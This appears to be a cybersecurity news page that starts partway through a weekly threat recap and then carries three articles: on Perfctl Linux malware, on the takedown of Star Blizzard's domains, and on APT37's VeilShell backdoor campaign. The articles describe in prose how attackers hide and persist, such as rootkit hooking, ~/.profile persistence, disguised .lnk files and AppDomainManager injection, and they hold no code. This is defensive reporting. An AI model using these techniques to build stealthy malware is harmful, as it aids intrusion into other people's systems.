    *   **A:** You can reduce compliance costs while strengthening security by smartly integrating modern tech and frameworks. Start by adopting unified security models like NIST CSF or ISO 27001 to cover multiple compliance needs, making audits easier. Focus on high-risk areas using methods like FAIR so your efforts tackle the most critical threats. Automate compliance checks with tools like Splunk or IBM QRadar, and use AI for faster threat detection. Consolidate your security tools into platforms like Microsoft 365 Defender to save on licenses and simplify management. Using cloud services with built-in compliance from providers like AWS or Azure can also cut infrastructure costs. Boost your team's security awareness with interactive training platforms to build a culture that avoids mistakes. Automate compliance reporting using ServiceNow GRC to make documentation easy. Implement Zero Trust strategies like micro-segmentation and continuous identity verification to strengthen defenses. Keep an eye on your systems with tools like Tenable.io to find and fix vulnerabilities early. By following these steps, you can save on compliance expenses while keeping your security strong.
*   **Cybersecurity Tools**
    *   **capa Explorer Web** is a browser-based tool that lets you interactively explore program capabilities identified by capa. It provides an easy way to analyze and visualize capa's results in your web browser. capa is a free, open-source tool by the FLARE team that extracts capabilities from executable files, helping you triage unknown files, guide reverse engineering, and hunt for malware.
    *   **Ransomware Tool Matrix** is an up-to-date list of tools used by ransomware and extortion gangs. Since these cybercriminals often reuse tools, we can use this info to hunt for threats, improve incident responses, spot patterns in their behavior, and simulate their tactics in security drills.

****🔒 Tip of the Week****

**Keep an "Ingredients List" for Your Software:** Your software is like a recipe made from various ingredients—third-party components and open-source libraries. By creating a **Software Bill of Materials (SBOM)**, a detailed list of these components, you can quickly find and fix security issues when they arise. Regularly update this list, integrate it into your development process, watch for new vulnerabilities, and educate your team about these parts. This reduces hidden risks, speeds up problem-solving, meets regulations, and builds trust through transparency.

****Conclusion****

Wow, this week really showed us that cyber threats can pop up where we least expect them—even in apps and networks we trust. The big lesson? Stay alert and always question what's in front of you. Keep learning, stay curious, and let's outsmart the bad guys together. Until next time, stay safe out there!

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

THN Cybersecurity Recap: Top Threats and Trends (Sep 30 - Oct 6)

Perfctl malware is hard to detect, persists after reboots, and can perform a breadth of malicious activities.

Thousands of machines running Linux have been infected by a malware strain that’s notable for its stealth, the number of misconfigurations it can exploit, and the breadth of malicious activities it can perform, researchers reported Thursday.

The malware has been circulating since at least 2021. It gets installed by exploiting more than 20,000 common misconfigurations, a capability that may make millions of machines connected to the internet potential targets, researchers from Aqua Security said. It can also exploit CVE-2023-33426, a vulnerability with a severity rating of 10 out of 10 that was patched last year in Apache RocketMQ, a messaging and streaming platform that’s found on many Linux machines.

****Perfctl Storm****

The researchers are calling the malware Perfctl, the name of a malicious component that surreptitiously mines cryptocurrency. The unknown developers of the malware gave the process a name that combines the perf Linux monitoring tool and ctl, an abbreviation commonly used with command line tools. A signature characteristic of Perfctl is its use of process and file names that are identical or similar to those commonly found in Linux environments. The naming convention is one of the many ways the malware attempts to escape notice of infected users.

Perfctl further cloaks itself using a host of other tricks. One is that it installs many of its components as rootkits, a special class of malware that hides its presence from the operating system and administrative tools. Other stealth mechanisms include:

*   Stopping activities that are easy to detect when a new user logs in
*   Using a Unix socket over TOR for external communications
*   Deleting its installation binary after execution and running as a background service thereafter
*   Manipulating the Linux process pcap\_loop through a technique known as hooking to prevent admin tools from recording the malicious traffic
*   Suppressing mesg errors to avoid any visible warnings during execution.

The malware is designed to ensure persistence, meaning the ability to remain on the infected machine after reboots or attempts to delete core components. Two such techniques are (1) modifying the ~/.profile script, which sets up the environment during user login so the malware loads ahead of legitimate workloads expected to run on the server and (2) copying itself from memory to multiple disk locations. The hooking of pcap\_loop can also provide persistence by allowing malicious activities to continue even after primary payloads are detected and removed.

Besides using the machine resources to mine cryptocurrency, Perfctl also turns the machine into a profit-making proxy that paying customers use to relay their internet traffic. Aqua Security researchers have also observed the malware serving as a backdoor to install other families of malware.

Assaf Morag, Aqua Security’s threat intelligence director, wrote in an email:

> Perfctl malware stands out as a significant threat due to its design, which enables it to evade detection while maintaining persistence on infected systems. This combination poses a challenge for defenders and indeed the malware has been linked to a growing number of reports and discussions across various forums, highlighting the distress and frustration of users who find themselves infected.
> 
> Perfctl uses a rootkit and changes some of the system utilities to hide the activity of the cryptominer and proxy-jacking software. It blends seamlessly into its environment with seemingly legitimate names. Additionally, Perfctl’s architecture enables it to perform a range of malicious activities, from data exfiltration to the deployment of additional payloads. Its versatility means that it can be leveraged for various malicious purposes, making it particularly dangerous for organizations and individuals alike.

****“The Malware Always Manages to Restart”****

While Perfctl and some of the malware it installs are detected by some antivirus software, Aqua Security researchers were unable to find any research reports on the malware. They were, however, able to find a wealth of threads on developer-related sites that discussed infections consistent with it.

This Reddit comment posted to the CentOS subreddit is typical. An admin noticed that two servers were infected with a cryptocurrency hijacker with the names perfcc and perfctl. The admin wanted help investigating the cause.

“I only became aware of the malware because my monitoring setup alerted me to 100% CPU utilization,” the admin wrote in the April 2023 post. “However, the process would stop immediately when I logged in via SSH or console. As soon as I logged out, the malware would resume running within a few seconds or minutes.” The admin continued:

> I have attempted to remove the malware by following the steps outlined in other forums, but to no avail. The malware always manages to restart once I log out. I have also searched the entire system for the string "perfcc" and found the files listed below. However, removing them did not resolve the issue. as it keep respawn on each time rebooted.

Other discussions include: Reddit, Stack Overflow (Spanish), forobeta (Spanish), brainycp (Russian), natnetwork (Indonesian), Proxmox (Deutsch), Camel2243 (Chinese), svrforum (Korean), exabytes, virtualmin, serverfault and many others.

After exploiting a vulnerability or misconfiguration, the exploit code downloads the main payload from a server, which, in most cases, has been hacked by the attacker and converted into a channel for distributing the malware anonymously. An attack that targeted the researchers’ honeypot named the payload httpd. Once executed, the file copies itself from memory to a new location in the /temp directory, runs it, and then terminates the original process and deletes the downloaded binary.

Once moved to the /tmp directory, the file executes under a different name, which mimics the name of a known Linux process. The file hosted on the honeypot was named sh. From there, the file establishes a local command-and-control process and attempts to gain root system rights by exploiting CVE-2021-4043, a privilege-escalation vulnerability that was patched in 2021 in Gpac, a widely used open source multimedia framework.

The malware goes on to copy itself from memory to a handful of other disk locations, once again using names that appear as routine system files. The malware then drops a rootkit, a host of popular Linux utilities that have been modified to serve as rootkits, and the miner. In some cases, the malware also installs software for “proxy-jacking,” the term for surreptitiously routing traffic through the infected machine so the true origin of the data isn’t revealed.

The researchers continued:

> As part of its command-and-control operation, the malware opens a Unix socket, creates two directories under the /tmp directory, and stores data there that influences its operation. This data includes host events, locations of the copies of itself, process names, communication logs, tokens, and additional log information. Additionally, the malware uses environment variables to store data that further affects its execution and behavior.
> 
> All the binaries are packed, stripped, and encrypted, indicating significant efforts to bypass defense mechanisms and hinder reverse engineering attempts. The malware also uses advanced evasion techniques, such as suspending its activity when it detects a new user in the btmp or utmp files and terminating any competing malware to maintain control over the infected system.

By extrapolating data such as the number of Linux servers connected to the internet across various services and applications, as tracked by services such as Shodan and Censys, the researchers estimate that the number of machines infected by Perfctl is measured in the thousands. They say that the pool of vulnerable machines—meaning those that have yet to install the patch for CVE-2023-33426 or contain a vulnerable misconfiguration—is in the millions. The researchers have yet to measure the amount of cryptocurrency the malicious miners have generated.

People who want to determine if their device has been targeted or infected by Perfctl should look for indicators of compromise included in Thursday’s post. They should also be on the lookout for unusual spikes in CPU usage or sudden system slowdowns, particularly if they occur during idle times. Thursday’s report also provides steps for preventing infections in the first place.

_This story originally appeared on_ _Ars Technica._

Stealthy Malware Has Infected Thousands of Linux Systems for Years

The successful disruption of notorious Russian hacker group Star Blizzard's operations arrives one month out from the US presidential election — one of the APT's prime targets.

Source: Enik via Alamy Stock Photo

Microsoft and the US Department of Justice joined forces this week to take down more than 100 domains linked to a Russian-sponsored hacker group known as Star Blizzard.

The advanced persistent threat (APT), active since 2017, has targeted journalists, non-governmental organizations (NGOs), and Russia experts, particularly those supporting Ukraine.

The operation, which dismantled the group’s server infrastructure in the West, is expected to delay the cyberattackers' ability to regroup and operate.

"Today's seizure of 41 internet domains reflects the Justice Department’s cyber strategy in action — using all tools to disrupt and deter malicious, state-sponsored cyber actors," Deputy Attorney General Lisa Monaco said in a statement issued by the DoJ.

Star Blizzard, also referred to as "Cold River" and "Callisto," uses primarily phishing emails to steal login credentials from its targets, and had recently developed its first custom backdoor.

In a partially unsealed indictment, the DoJ also revealed that two FSB officers, Ruslan Peretyatko and Andrey Korinets, were charged last December for their involvement in Star Blizzard espionage campaigns, which have extended to the UK, NATO countries, and Ukraine. The government's affidavit reveals that in the US, the group targeted military contractors, intelligence community personnel, and government agencies, among others.

The Kremlin-sponsored APT is known for its sophisticated evasion techniques, although Microsoft has been following it, and disrupted the group's activities in 2022 and again last year.

"Rebuilding infrastructure takes time, absorbs resources, and costs money," Microsoft noted in a blog post on the most recent takedown. "Today's action is an example of the impact we can have against cybercrime when we work together."

**A Step in Protection as US Election Nears**

The disruption comes at a crucial time, as US officials are on high alert for foreign interference ahead of the upcoming presidential election. With Star Blizzard's status as a tool for advancing Russian interests, including election disruption, Microsoft emphasized that the takedown action directly impacts efforts to protect the US democratic process from external threats.

"Between January 2023 and August 2024, Microsoft observed Star Blizzard target over 30 civil society organizations — journalists, think tanks, and non-governmental organizations (NGOs) core to ensuring democracy can thrive — by deploying spear-phishing campaigns to exfiltrate sensitive information and interfere in their activities. While we expect Star Blizzard to always be establishing new infrastructure, today's action impacts their operations at a critical point in time when foreign interference in US democratic processes is of utmost concern."

**Russian Threat Likely to Persist**

Sean McNee, head of threat research at DomainTools, says he anticipates a dramatic increase in nation-state backed groups turning toward purchasing domains to carry out cyberespionage, and to seed misinformation and disinformation around the US election as well — so the combined DoJ/Microsoft action might just be a drop in the ocean.

"\[The Star Blizzard takedown is a\] huge step in protecting the Internet," he says, but adds it is likely only "scratching the surface" when it comes to FSB or other groups who have purchased domains to seed malignant websites.

"We have found that some domain hosting services sell domain registrations indiscriminately and are not always responsive when notified about malicious content or coordinated misinformation," he explains.

Tom Kellermann, senior vice president of cyber strategy at Contrast Security, warns Russia has "ratcheted up the cyber insurgency" in American cyberspace.

"Russia is cognizant that the soft underbelly of the US is our dependence on technology," he says, pointing out that the Star Blizzard revelations show that "the GRU and a few cybercrime cartels are collaborating in widespread campaigns of infiltration."

He says he is concerned that the resultant backdoors will be used to deploy destructive malware in the coming days, adding threat hunting must be expanded and runtime security must be activated to blunt the Russian campaign.

"Something wicked this way comes," Kellerman says. "The private sector must take this warning seriously."

**About the Author**

Nathan Eddy is a freelance journalist and award-winning documentary filmmaker specializing in IT security, autonomous vehicle technology, customer experience technology, and architecture and urban planning. A graduate of Northwestern University’s Medill School of Journalism, Nathan currently lives in Berlin, Germany.

Microsoft, DOJ Dismantle Russian Hacker Group Star Blizzard

It's North Korea versus Cambodia, with Windows default settings and sheer patience allowing the bad guys to avoid easy detection.

Source: motioncenter via Alamy Stock Photo

The North Korean state-sponsored threat actor known as APT37 has been carefully spreading a novel backdoor, dubbed "VeilShell." Of note is its target: Most North Korean advanced persistent threats (APTs) have a history of targeting organizations in South Korea or Japan, but APT37's latest campaign seems to be directed at a nation Kim Jong-Un has more complex relations with: Cambodia.

While Pyongyang still maintains an embassy in Phnom Penh and the two nations share a history of Soviet ties in the region, the modern-day relationship between the two is far from cozy. The DPRK's nuclear weapons program, ongoing missile tests, cyber activities, and general aggression towards its neighbors contradicts Cambodia's stance on weapons of mass destruction (WMDs) and its call for meaningful diplomatic dialogue between all countries in the region, observers in the region have noted.

That wariness has drawn the attention of the North Korean regime, according to Securonix, which has flagged a new campaign called "Shrouded#Sleep" circulating against Cambodian organizations.

Securonix did not share detailed victimology, but to lure in targets, APT37 (aka InkSquid, RedEyes, BadRAT, Reaper, ScarCruft, and Ricochet Chollima) has been spreading malicious emails relating to Cambodian affairs, and in Cambodia's primary language, Khmer. One lure for instance offers recipients access to a spreadsheet related to annual income in US dollars across various sectors in the country, such as social work, education, health, and agriculture.

Related:China-Backed APT Group Culling Thai Government Data

Hidden in these emails are maliciously crafted shortcut files concealing the backdoor, used to establish quiet persistence in targeted networks.

**Shrouded#Sleep's Stealthy Shortcuts**

In terms of the infection routine, a Shrouded#Sleep infection begins, like many others do, with a .ZIP archive containing a Windows shortcut (.LNK) file.

"It's incredibly common — if you were to throw a dart at the threat actor dartboard, a shortcut file is probably going to be hit," says Tim Peck, senior threat researcher at Securonix. "It's easy, it's effective. It pairs really well with phishing emails. And it's easy to mask."

Windows hides the .LNK file extension by default, substituting it with a little arrow in the bottom left hand corner of a file's icon, making for an overall cleaner user interface. The upshot is that attackers like APT37 can swap a .LNK's default icon with another of their choosing, and use double extensions to hide the true nature of the file.

APT37 gives its shortcut files PDF and Excel icons, and assigned them double extensions like ".pdf.lnk," or ".xls.lnk," so that only the .PDF and .XLS parts of the extension show up for users.

Related:UAE, Saudi Arabia Become Plum Cyberattack Targets

In the end, Peck notes, "Unless you're looking for the little arrow that Microsoft adds on shortcut files, odds are you might miss that." An unreasonably eagle-eyed victim might also have noticed that unlike typical shortcut files — which tend to be just a few kilobytes in size — these were anywhere from 60 to 600 kilobytes.

Contained within those kilobytes was APT37's malicious payload, which Securonix has named "VeilShell." 

**VeilShell's Patient Persistence**

The SHROUDED#SLEEP campaign is notable for its state-of-the-art blend of living-off-the-land and proprietary tools, plus impressive persistence and stealth mechanism.

"It represents a sophisticated and stealthy operation targeting Southeast Asia leveraging multiple layers of execution, persistence mechanisms, and a versatile PowerShell-based backdoor RAT to achieve long-term control over compromised systems," according to the Securonix analysis. "Throughout this investigation, we have shown how the threat actors methodically crafted their payloads and made use of an interesting combination of legitimate tools and techniques to bypass defenses and maintain access to their targets."

Related:China's 'Earth Baxia' Spies Exploit Geoserver to Target APAC Orgs

VeilShell for instance is a multifunctional, PowerShell-based backdoor-plus-remote-access-trojan (RAT). It's capable of all the things RATs tend to do: download and upload files, modify and delete existing files on the system, modify system settings, create scheduled tasks for persistence, etc.

Notably, APT37 also achieves persistence via AppDomainManager injection, a rarer technique involving the injection of malicious code into .NET applications.

All of these malicious functions and techniques might otherwise make a lot of noise on targeted systems, so APT37 uses some tricks to provide counterbalance. For example, it implements long sleep timers to break up different stages of the attack chain, ensuring that malicious activities don't occur in obvious succession.

As Peck tells it, "The threat actors were incredibly patient, slow, and methodical. They used a lot of long sleep timers — we're talking, like, 6,000 seconds in between different attack stages. And the main goal \[of the shortcut file\] was to set the stage. It didn't actually execute any malware. It dropped the files into a location that would allow them to execute on their own on the next system reboot. That reboot could be the same day, or a week from now, depending on how the user uses their PC."

It was emblematic, perhaps, of a threat actor with confidence and patience to spare. "A lot of times we see these dive in, dive out types of campaigns. But this was definitely designed with stealth in mind," he says.

**About the Author**

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

Tag

#backdoor